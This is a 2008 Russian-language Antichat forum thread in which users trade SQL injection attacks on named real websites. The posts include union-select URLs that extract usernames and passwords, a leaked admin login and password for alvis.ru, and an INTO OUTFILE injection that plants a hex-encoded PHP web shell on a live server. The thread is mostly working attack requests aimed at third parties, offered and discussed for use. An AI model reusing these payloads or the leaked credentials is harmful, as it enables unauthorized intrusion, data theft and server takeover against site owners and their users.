ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2881  
Старый 07.08.2008, 13:11
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Nea7  
вот в таком представление хранятся пароли в таблице:
'xIAЖИO®Ык§\0ЛMуЎШЄЦ°`Ж',
'СЛi›Ъј9Qb п7є.',

как их правильно отобразить?
Если convert или UNHEX/HEX не прокатывает , то скорее всего пароли закриптованы aes_encrypt ,с ключом который ты не знаешь, или самописной кодировкой, тоесть врятли ты их увидишь
 
Ответить с цитированием

  #2882  
Старый 07.08.2008, 16:10
eLWAux
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию

ребята, кароце я все понял про alvis.ru:
админ иногда вирубивает доступ к alvis.ru/admin
и поетому иногда не получаетса туда попасть..
а вот и сам админ:
pwd = shb09789
login = www
mail = webmaster@alvis.ru

проблему с сайтом решено !!

СПАСИБО всем кто мне дал помощ =)
 
Ответить с цитированием

  #2883  
Старый 08.08.2008, 01:01
eLWAux
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию

и ето опять я =)
вот ещо один сайт kino.ru
вроде SQL есть..
http://kino.ru/cinema.php?id=152' но при етом ошибка не появляетса
http://kino.ru/cinema.php?id=152+AND+1=1/* все ок!
http://kino.ru/cinema.php?id=152+AND+1=2/* пусто!
я думаю ето SQL инекция =)
но, я уже и substring и union select 1,...../* пробовал,
но при етих запросах никак немогу понят, ответ GOOD или нет=)
 
Ответить с цитированием

  #2884  
Старый 08.08.2008, 09:07
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

По-моему, ты ошибся. При всех запросах выводится одно и то же. Поищи скулю в "поиске" =)
Код:
111' union select 1,2,3,4,5 from email limit 950,1/*

Последний раз редактировалось krypt3r; 08.08.2008 в 13:23..
 
Ответить с цитированием

  #2885  
Старый 08.08.2008, 16:34
xWhitex
Новичок
Регистрация: 07.08.2008
Сообщений: 8
Провел на форуме:
33013

Репутация: 3
По умолчанию

Собствено такой вопрос Sql выдает пароль, и логин но в админку незаходит.
вот пример:
Цитата:
http://www.ssw-pruefsysteme.de/i_shop/shopdisplayproducts.asp?cat='%20union%20select%201 ,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,fldpassword,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37%20from%20tbluser"having%201=%2 01--sp_password
А вот сама админка:
Цитата:
http://www.ssw-pruefsysteme.de/i_shop/ssw_shopadmin35.asp
Собствено что можно зделать?
 
Ответить с цитированием

  #2886  
Старый 08.08.2008, 17:25
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

Возможно стоит блок по ай-пи. То есть в админку может заходить только с ай-пи 75.125.150.120 - к примеру.
 
Ответить с цитированием

  #2887  
Старый 09.08.2008, 00:50
eLWAux
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию

xWhitex: ну или (так как у меня с alvis.ru било) просто вход в админку иногда вирубивають =(
 
Ответить с цитированием

  #2888  
Старый 09.08.2008, 00:56
WAR!9G
Участник форума
Регистрация: 24.06.2007
Сообщений: 299
Провел на форуме:
467372

Репутация: 212
По умолчанию

Цитата:
Собствено что можно зделать?
Эмм, ну вобщето ты получил пасс от самой базы данных, а не пасс от админки
 
Ответить с цитированием

  #2889  
Старый 09.08.2008, 03:07
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

Здрастье =)
у меня вопрос:
Цитата:
http://www.pixheaven.net/galerie_us.php?id=-3+union
+select+1,2,3,4,5,6,7,8,9/*
Вот скуля,принтабельное поле - 7
Цитата:
http://www.pixheaven.net/galerie_us.php?id=-3+union+select+1,2,3,4,5,6,version(),8,9/*

J\Очень интересно выводиться версия,можно ли вывести данные кроме version()???
Заранее спасибо
 
Ответить с цитированием

  #2890  
Старый 09.08.2008, 03:36
MirA
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513

Репутация: 52
Отправить сообщение для MirA с помощью ICQ
По умолчанию

Цитата:
Сообщение от DDoSька  
Здрастье =)
у меня вопрос:
+select+1,2,3,4,5,6,7,8,9/*
Вот скуля,принтабельное поле - 7


J\Очень интересно выводиться версия,можно ли вывести данные кроме version()???
Заранее спасибо
скорее всего нет,я думаю,там стоит ограничение по типу данных и по длине...

а у меня такой вопрос:
почему не проходит конструкция ?
Цитата:
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,0x3c3f2073797374656d28245f4745545b27636d64275d293b 203f3e,3,4,5+from+main_data2.admin+into+outfile+0x2f7661722f7777772f666f72756d2f7368656c6c2e706870/*
0x3c3f2073797374656d28245f4745545b27636d64275d293b 203f3e - <? system($_GET['cmd']); ?>
0x2f7661722f7777772f666f72756d2f7368656c6c2e706870 - установочная дирректория /var/www/forum/shell.php
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ